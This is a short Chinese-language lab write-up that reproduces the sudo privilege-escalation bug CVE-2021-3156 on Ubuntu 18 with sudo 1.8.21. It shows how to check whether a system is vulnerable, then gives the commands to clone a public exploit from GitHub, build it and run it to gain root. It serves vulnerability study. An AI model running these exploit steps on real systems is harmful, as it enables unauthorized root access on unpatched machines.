CVE-2021-3156 sudo提權漏洞復現


CVE-2021-3156 sudo提權漏洞復現

sudo官方在一月份的時候已經將漏洞修復,因此后面更新安裝的sudo已經補上這個漏洞

復現環境

Ubuntu18 + sudo 1.8.21

image-20210411151758529

低權限用戶test

image-20210411151846141

vim /etc/sudoers

test ALL=(root) NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod

漏洞復現

image-20210411152027247

報錯開頭以sudoedit則存在漏洞,報錯以usage開頭,則不受影響

下載exp並執行

git clone https://github.com/blasty/CVE-2021-3156.git
make
./sudo-hax-me-a-sandwich 0

image-20210411152155906


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM